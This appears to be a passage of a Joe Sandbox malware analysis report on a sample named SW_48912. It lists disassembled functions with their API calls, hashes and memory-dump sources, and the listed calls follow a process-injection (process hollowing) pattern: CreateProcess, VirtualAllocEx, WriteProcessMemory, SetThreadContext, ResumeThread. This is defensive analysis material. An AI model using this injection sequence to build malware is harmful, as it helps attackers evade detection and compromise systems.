                                                                                                                      • Instruction ID: 73b7d634989856cbebdbc1e788788cd8d905732d03121cbd22ee10cbfc1632ee
                                                                                                                      • Opcode Fuzzy Hash: 7b6fa6ea1a7e2e8d76887bcfbd7911f47c108eaf6bce733afc858521f6e32927
                                                                                                                      • Instruction Fuzzy Hash: 0EC08060B1020D5F7B745DA5FC0031325D1FB4190136061A54C00C3182DA1DC440C251
                                                                                                                      Function 06F8156D Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F817AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: e1a4e495d9885eab37893dbdd010926ee654f03018baef69d46855a2b9d2c1c3
                                                                                                                      • Instruction ID: 8492f3d696de52fb4d5e14c6e3a751558f93dc2a5d503f8abfaf87d746e5fc31
                                                                                                                      • Opcode Fuzzy Hash: e1a4e495d9885eab37893dbdd010926ee654f03018baef69d46855a2b9d2c1c3
                                                                                                                      • Instruction Fuzzy Hash: 4FA16D71D0021ACFDF54DFA8C841BEEBBB2BF49310F1486A9D849A7250DB749986CF91
                                                                                                                      Function 06F81578 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F817AE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: a6effe92cd5cc6b43b35c0dc9e313847629b857cbe4fa3ebeb7fa11ef1c31bcc
                                                                                                                      • Instruction ID: 7a1ad714c093ec1d61c9c33fdb4d6fafa0100c03219436513fba013590419afe
                                                                                                                      • Opcode Fuzzy Hash: a6effe92cd5cc6b43b35c0dc9e313847629b857cbe4fa3ebeb7fa11ef1c31bcc
                                                                                                                      • Instruction Fuzzy Hash: 43915D71D0031A8FDF54DFA8C841BEEBBB2BF49310F1486A9D849A7250DB749986CF91
                                                                                                                      Function 06F82438 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ActiveWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2558294473-0
                                                                                                                      • Opcode ID: ee29fa2b4f02082d458734a4c2ce9595fe6094034f79c209fa0f5372b7e107d4
                                                                                                                      • Instruction ID: e2178808819962f6160a7488081ff4c70054b3772d00b551838030ba47fac45d
                                                                                                                      • Opcode Fuzzy Hash: ee29fa2b4f02082d458734a4c2ce9595fe6094034f79c209fa0f5372b7e107d4
                                                                                                                      • Instruction Fuzzy Hash: 2761CE70E103099FDF54EFA5D854BAEBBB2EF88300F148469E805AB394DB74E941CB90
                                                                                                                      Function 06B8EE10 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932074508.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6b80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4'dq
                                                                                                                      • API String ID: 0-1167855494
                                                                                                                      • Opcode ID: 9eedf003e178564057471b60d45ef302f4f1897bf19a2a5f04fbc898f8bb962d
                                                                                                                      • Instruction ID: 85f1bab71c11c500e3b5911f6ac015da2ae084963d769b82f706bc6d4fcffacd
                                                                                                                      • Opcode Fuzzy Hash: 9eedf003e178564057471b60d45ef302f4f1897bf19a2a5f04fbc898f8bb962d
                                                                                                                      • Instruction Fuzzy Hash: F0E174B4E10219DFDB45EFA8D444BAEBBB2FF88301F108099E505A7364CB359D46EB91
                                                                                                                      Function 023958EC Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 023959A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2289755597-0
                                                                                                                      • Opcode ID: 47dcc63def3f3a44858e48ab9901a3b7ca2b7c08c7354e40a27cb7ab35ce6f99
                                                                                                                      • Instruction ID: bb684f002fb11f87e13aeec0e1a5bf0ebf120f95c0956a4c5a20d2502d4650cb
                                                                                                                      • Opcode Fuzzy Hash: 47dcc63def3f3a44858e48ab9901a3b7ca2b7c08c7354e40a27cb7ab35ce6f99
                                                                                                                      • Instruction Fuzzy Hash: 5A41C2B0C00719CBEB25DFA9C8847CEBBB5BF45714F20806AD409AB251DB75698ACF90
                                                                                                                      Function 023944C4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 023959A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2289755597-0
                                                                                                                      • Opcode ID: 19f13c6454a60260e1b55030db2e8135bef1f1bac3e1a6151738559afffb2ea3
                                                                                                                      • Instruction ID: 3ea52a20cc535503ec85c5b677e3367b5fe1b433025b47762edad81d6c269773
                                                                                                                      • Opcode Fuzzy Hash: 19f13c6454a60260e1b55030db2e8135bef1f1bac3e1a6151738559afffb2ea3
                                                                                                                      • Instruction Fuzzy Hash: 0F41D2B0C00719CFEB25DFA9C844B9EBBB5BF49314F60806AD409AB251DB756949CF90
                                                                                                                      Function 06678AD0 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3668623891-0
                                                                                                                      • Opcode ID: 1534fc677d524b930bb056db888ad460d039c82d5467f4c9d981c61fcdcc271e
                                                                                                                      • Instruction ID: 5720eacbf624c693e5efbc7768a48c7ba4114a6f22e0e6ea629cda91c138858e
                                                                                                                      • Opcode Fuzzy Hash: 1534fc677d524b930bb056db888ad460d039c82d5467f4c9d981c61fcdcc271e
                                                                                                                      • Instruction Fuzzy Hash: 9F318BB29003489FCB11DFA9C844ADEBFF8EF49310F14845AE954A7261C335E954DFA1
                                                                                                                      Function 06F812E8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F81380
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: 7d61ffef45dcc9da7317d082fb08f9fe4973cdc8c59095b9e99fde2b4395a10a
                                                                                                                      • Instruction ID: 5eabdd4bd14cceb13b56c6630c1dccc6c1c1007262cdafa03f0bc5def5d56a92
                                                                                                                      • Opcode Fuzzy Hash: 7d61ffef45dcc9da7317d082fb08f9fe4973cdc8c59095b9e99fde2b4395a10a
                                                                                                                      • Instruction Fuzzy Hash: 4A2169B1D003099FCB10DFA9C885BEEBBF5FF48310F10842AE919A7241C7789A55CBA0
                                                                                                                      Function 06F812F0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F81380
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3559483778-0
                                                                                                                      • Opcode ID: bbbeb054127b04ad09ad6d2e9467a7118e2af69611377c45270a52c31a158615
                                                                                                                      • Instruction ID: f539e619dbafa587fc0add3b8514026b4c094b2a926a2b2e9bb2ada2b2644621
                                                                                                                      • Opcode Fuzzy Hash: bbbeb054127b04ad09ad6d2e9467a7118e2af69611377c45270a52c31a158615
                                                                                                                      • Instruction Fuzzy Hash: C22139B1D003499FCB10DFAAC885BDEBBF5FF48310F108429E919A7241C7789955DBA4
                                                                                                                      Function 06F813D9 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F81460
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1726664587-0
                                                                                                                      • Opcode ID: 16a466c6a152a213c8346daaa2689bd4d2e40f092322261bca2968c21cf59714
                                                                                                                      • Instruction ID: f77a4521065524feec699feaac468d317be27b542f37992a017043af8b168a99
                                                                                                                      • Opcode Fuzzy Hash: 16a466c6a152a213c8346daaa2689bd4d2e40f092322261bca2968c21cf59714
                                                                                                                      • Instruction Fuzzy Hash: 7F2159B1C003499FCB10DFAAC884ADEFBF5FF88320F50842AE559A3251C7749905DBA0
                                                                                                                      Function 06F808E1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F80966
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: a291b20b7c05aac8dfff270c2f6e6839239c58e2b8727540fb8c6128eaf927ba
                                                                                                                      • Instruction ID: 5d79bc7c13d35a827b7bb01d01a5b8d71e4b50e040e1c025e27e42ef34072bca
                                                                                                                      • Opcode Fuzzy Hash: a291b20b7c05aac8dfff270c2f6e6839239c58e2b8727540fb8c6128eaf927ba
                                                                                                                      • Instruction Fuzzy Hash: DD2137B1D002099FDB50DFAAC4857EEBBF4EF88324F548429D559A7341CB789945CBA0
                                                                                                                      Function 06F813E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F81460
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1726664587-0
                                                                                                                      • Opcode ID: 2a5a362a6baf19b3727bd1a5c93e7ce28031fac53cf10c2788542f120e950bfd
                                                                                                                      • Instruction ID: 120ced4f8d4f13b64b1343fcca3ca492c4792f8fd57bb77ed27ecb516dab942b
                                                                                                                      • Opcode Fuzzy Hash: 2a5a362a6baf19b3727bd1a5c93e7ce28031fac53cf10c2788542f120e950bfd
                                                                                                                      • Instruction Fuzzy Hash: 7C213AB1C003499FDB10DFAAC885ADEFBF5FF48320F508429E559A7250C7349945DBA4
                                                                                                                      Function 06F808E8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F80966
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 983334009-0
                                                                                                                      • Opcode ID: 546cb633b8faa69e91729e4aebac97370f7e459d6b40a2db3e57b4e9400c0b7d
                                                                                                                      • Instruction ID: cfb0311a9f199dfdb44354c9812b275afcde232b5182a86311cb0a2c0a393620
                                                                                                                      • Opcode Fuzzy Hash: 546cb633b8faa69e91729e4aebac97370f7e459d6b40a2db3e57b4e9400c0b7d
                                                                                                                      • Instruction Fuzzy Hash: E12134B1D003098FDB50DFAAC4857AEBBF4EF88320F54842AD559A7341CB78A944CBA4
                                                                                                                      Function 06F83969 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnumThreadWindows.USER32(?,00000000,0538D49E,?,?,?,00000E20,?,?,06F83950,03534130,02550A98), ref: 06F839E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumThreadWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2941952884-0
                                                                                                                      • Opcode ID: 34562ac5d4cae2b64eb9c260ff778b180ce7671151c47efdf1ad2f93ec36fd2d
                                                                                                                      • Instruction ID: 57d626ce6321f9f0f5b368848f4afcc7fb859d249a23c65f7bbd880b6be04c51
                                                                                                                      • Opcode Fuzzy Hash: 34562ac5d4cae2b64eb9c260ff778b180ce7671151c47efdf1ad2f93ec36fd2d
                                                                                                                      • Instruction Fuzzy Hash: D0213BB1D002198FDB54DF9AC945BEEFBF9EB88320F14842AD459A3250D774A944CFA1
                                                                                                                      Function 06F82D64 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnumThreadWindows.USER32(?,00000000,0538D49E,?,?,?,00000E20,?,?,06F83950,03534130,02550A98), ref: 06F839E1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumThreadWindows
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2941952884-0
                                                                                                                      • Opcode ID: b24ccad5ade6a5a1b42b4c4b3399ade861390a56d28fb7a9be73def5c178e0fd
                                                                                                                      • Instruction ID: f237d6d671c7406071a3563e5cf06845a6f08a7cdf005479bdde56b09738ad7e
                                                                                                                      • Opcode Fuzzy Hash: b24ccad5ade6a5a1b42b4c4b3399ade861390a56d28fb7a9be73def5c178e0fd
                                                                                                                      • Instruction Fuzzy Hash: 88212971D002098FDB54DF9AC845BEEFBF9EB88320F14846AD459A3350DB74A944CFA5
                                                                                                                      Function 0239DDA0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0239DE27
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DuplicateHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3793708945-0
                                                                                                                      • Opcode ID: 5b94016f8a3c5f8087257db522165bd899489e3f290e1796a9e05f63fa38bc29
                                                                                                                      • Instruction ID: 72de4846d897f6d2000cd86baf3db70c954913191f8ba28807accfcf722fcd07
                                                                                                                      • Opcode Fuzzy Hash: 5b94016f8a3c5f8087257db522165bd899489e3f290e1796a9e05f63fa38bc29
                                                                                                                      • Instruction Fuzzy Hash: 8521E2B5D002489FDB10DFAAD984ADEFBF8EB48320F14845AE918A3350C374A944CFA0
                                                                                                                      Function 06F801B8 Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06F82689,?,?,?), ref: 06F83E35
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2030045667-0
                                                                                                                      • Opcode ID: c5891e7d57c13140af5ec78dd0ada2a50c2a7b4f8f202898d9564b2a3a13f3fd
                                                                                                                      • Instruction ID: c2169d1d379729c7cec2a5ec197a180dd7bfff52bd22548226da7b11bbabeb88
                                                                                                                      • Opcode Fuzzy Hash: c5891e7d57c13140af5ec78dd0ada2a50c2a7b4f8f202898d9564b2a3a13f3fd
                                                                                                                      • Instruction Fuzzy Hash: FB2104B6C003499FDB14DF9AC884ADEFBF5FB48710F10846EE819A7210C375A948CBA1
                                                                                                                      Function 06F83DB0 Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06F82689,?,?,?), ref: 06F83E35
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2030045667-0
                                                                                                                      • Opcode ID: aaa07adc3da707b1c25496cc7f32a2a9957ea14a745340e8c855433e2d284e44
                                                                                                                      • Instruction ID: 11d8831199cac50f7415f06279cc7f5baf16e109e023cb6aaefb3d22cd0a6606
                                                                                                                      • Opcode Fuzzy Hash: aaa07adc3da707b1c25496cc7f32a2a9957ea14a745340e8c855433e2d284e44
                                                                                                                      • Instruction Fuzzy Hash: 732102B6C013499FCB14DF9AC884ADEBBB5BB48310F14856AE419A7210C374A948CBA0
                                                                                                                      Function 06677784 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06678AEA,?,?,?,?,?), ref: 06678B8F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1930753174.0000000006670000.00000040.00000800.00020000.00000000.sdmp, Offset: 06670000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6670000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3668623891-0
                                                                                                                      • Opcode ID: 99b63c35f3ec907ee8c0431093e354843f765919f78585b4cdfb20a985aadf68
                                                                                                                      • Instruction ID: ce40811fdfbe821db1351744a3caa3f0f0390fe25d755acc8ee07f555fde67b2
                                                                                                                      • Opcode Fuzzy Hash: 99b63c35f3ec907ee8c0431093e354843f765919f78585b4cdfb20a985aadf68
                                                                                                                      • Instruction Fuzzy Hash: 381167B58003499FDB10DF9AC848BDEBFF8EB48320F14841AE914A3210C339A950DFA4
                                                                                                                      Function 06F80DF0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F80E66
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: fd91be830b009e373e72dafa74dec2bb7d6766d59d60b429ed69f1cc7a514ffb
                                                                                                                      • Instruction ID: 7b1c3b8cf9a154205483ba5ecc7b491ac61c0d563bf4824c834eadff66aba942
                                                                                                                      • Opcode Fuzzy Hash: fd91be830b009e373e72dafa74dec2bb7d6766d59d60b429ed69f1cc7a514ffb
                                                                                                                      • Instruction Fuzzy Hash: 98116AB59002089FCB10DFA9C845BEFBBF9EF48320F148419E519A7250CB359954CFA0
                                                                                                                      Function 06F80DF8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F80E66
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 5273f460f34dea996deab525574a77a96d9f3b7164cd32e1263e81e65ecf00a3
                                                                                                                      • Instruction ID: 77eecf4063c6017a1966c2f1dd1615082b5029222cecc87ab5fc8e7d1ddc1f17
                                                                                                                      • Opcode Fuzzy Hash: 5273f460f34dea996deab525574a77a96d9f3b7164cd32e1263e81e65ecf00a3
                                                                                                                      • Instruction Fuzzy Hash: 841137719002499FCB10DFAAC845ADFBFF5EF88320F148419E519A7250CB75A944DFA0
                                                                                                                      Function 06F80831 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ResumeThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 947044025-0
                                                                                                                      • Opcode ID: 57e7f619de5b75f76813a66802f8d8047a0e64bca00aff8462ec3b6d3c00a417
                                                                                                                      • Instruction ID: 77a1a80060390a2a917e4caaa4e4d7c318f172fa665501065ef6ebdcd42439b3
                                                                                                                      • Opcode Fuzzy Hash: 57e7f619de5b75f76813a66802f8d8047a0e64bca00aff8462ec3b6d3c00a417
                                                                                                                      • Instruction Fuzzy Hash: 651116B1D002498FDB14DFAAC8457EFBBF5AB48324F248819D519B7240CB39A544CBA4
                                                                                                                      Function 06F80838 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ResumeThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 947044025-0
                                                                                                                      • Opcode ID: d61596b392745526ff64e72f35c83f09ce1215f0471c7eee84ecc6b22c9751fd
                                                                                                                      • Instruction ID: 54734f1015570a398665b6b1fe7195efed2288e3693b36943ab2633556413470
                                                                                                                      • Opcode Fuzzy Hash: d61596b392745526ff64e72f35c83f09ce1215f0471c7eee84ecc6b22c9751fd
                                                                                                                      • Instruction Fuzzy Hash: A81125B1D003488FDB14EFAAC84579EFBF9EB88324F248419D519A7240CB75A944CBA4
                                                                                                                      Function 06F84158 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 06F841BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1932510432.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_6f80000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 410705778-0
                                                                                                                      • Opcode ID: eadd805d501170c0adf8f532848f715a4ead8ad43f2b6f57bc7b4bea4a235542
                                                                                                                      • Instruction ID: 8bbc27e9940b86860325a366d67ca16777a042608ed504f2e148c6cb8102ee57
                                                                                                                      • Opcode Fuzzy Hash: eadd805d501170c0adf8f532848f715a4ead8ad43f2b6f57bc7b4bea4a235542
                                                                                                                      • Instruction Fuzzy Hash: AB1103B5800349DFDB10DF9AD989BDFBBF8EB48320F10844AE518A3650C374A654CFA1
                                                                                                                      Function 0239BAC0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0239BB26
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1920811333.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_2390000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4139908857-0
                                                                                                                      • Opcode ID: 86b3e89e1a19165d980b855f3ba82c280dcf591342a80cd9abaaa2c1ef3cc731
